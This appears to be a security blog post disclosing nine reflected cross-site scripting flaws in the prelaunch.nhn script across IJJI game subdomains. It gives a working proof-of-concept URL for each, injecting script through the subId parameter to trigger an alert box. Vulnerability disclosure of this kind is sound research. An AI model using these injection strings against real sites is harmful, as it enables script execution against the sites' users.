Type: Non-persistent
Criteria: None
Thus begins the final 4 days of this experiment; hopefully ending with a bang.
This post will disclose 9 separate vulnerabilities in the prelaunch.nhn script used to communicate with the various plugins to launch one of the many games offered on the IJJI service.
1) Top-level
http://www.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
2) www2
http://www2.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
3) Huxley:The Dystopia
http://huxley.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
4) Soldier Front
http://sfront.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
5) GunZ
http://gunz.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
6) Drift City
http://drift.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
7) Lunia
http://lunia.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
8) Game
http://game.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
9) Events
http://event.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
They clearly all exploit the same parameter, as they share the same script. I plan to write up better descriptions in a separate post.